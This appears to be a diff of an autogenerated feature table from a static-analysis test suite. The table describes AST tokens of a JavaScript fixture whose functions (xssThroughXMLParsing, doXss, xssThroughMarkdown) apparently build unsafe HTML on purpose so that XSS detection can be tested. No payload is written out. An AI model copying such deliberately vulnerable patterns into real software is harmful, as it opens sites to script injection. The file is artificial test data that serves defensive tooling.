constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:33:34:49 | "./jquery-plugin" | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:33:34:49 | "./jquery-plugin" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:33 | module. ... Parsing | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:33 | module. ... Parsing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:36:33 | module. ... Parsing | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:38:1 | module. ... DOM.\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:38:1 | module. ... DOM.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:1:38:1 | module. ... DOM.\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:8:36:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:8:36:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:8:36:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:16:36:33 | plainDOMXMLParsing | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:16:36:33 | plainDOMXMLParsing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:16:36:33 | plainDOMXMLParsing | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:36:36 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:36:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:36:36 | this | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:36:36 | this | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:36:36 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | 'arguments' object of anonymous function | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | exceptional return of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | exceptional return of anonymous function | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | functio ... DOM.\\n} | assignedToPropName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | functio ... DOM.\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | functio ... DOM.\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | functio ... DOM.\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | return of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | return of anonymous function | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:37:38:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:36:47:36:47 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:13 | doc | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:13 | doc | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:13 | doc | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:13 | doc | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:13 | doc | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:62 | doc = n ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:62 | doc = n ... t/xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:62 | doc = n ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:62 | doc = n ... t/xml") | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:11:37:62 | doc = n ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | exceptional return of new DOMParser() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | exceptional return of new DOMParser() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | exceptional return of new DOMParser() | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | exceptional return of new DOMParser() | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | exceptional return of new DOMParser() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | new DOMParser() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | new DOMParser() | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | new DOMParser() | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | new DOMParser() | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:31 | new DOMParser() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:47 | new DOM ... mString | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:47 | new DOM ... mString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:47 | new DOM ... mString | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:47 | new DOM ... mString | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:47 | new DOM ... mString | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | exceptional return of new DOM ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | exceptional return of new DOM ... t/xml") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | exceptional return of new DOM ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | exceptional return of new DOM ... t/xml") | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | exceptional return of new DOM ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | new DOM ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | new DOM ... t/xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | new DOM ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | new DOM ... t/xml") | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:17:37:62 | new DOM ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:21:37:29 | DOMParser | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:21:37:29 | DOMParser | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:21:37:29 | DOMParser | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:21:37:29 | DOMParser | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:21:37:29 | DOMParser | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:33:37:47 | parseFromString | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:33:37:47 | parseFromString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:33:37:47 | parseFromString | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:33:37:47 | parseFromString | enclosingFunctionName | plainDOMXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:33:37:47 | parseFromString | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:49:37:49 | s | CalleeFlexibleAccessPath | DOMParser().parseFromString | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:49:37:49 | s | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:49:37:49 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23006,6 +151765,153 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:52:37:61 | "text/xml" | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:52:37:61 | "text/xml" | enclosingFunctionName | plainDOMXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:37:52:37:61 | "text/xml" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:1:50:1 | Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:1:50:1 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:1:50:1 | Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:1:50:1 | class F ... }\\n\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:1:50:1 | class F ... }\\n\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:1:50:1 | class F ... }\\n\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:7:40:9 | Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:7:40:9 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:7:40:9 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:40:7:40:9 | Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:41:15 | constructor | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:41:15 | constructor | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:41:15 | constructor | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:43:5 | constru ... ;\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:43:5 | constru ... ;\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:43:5 | constru ... ;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:43:5 | constru ... ;\\n } | contextSurroundingFunctionParameters | | +| 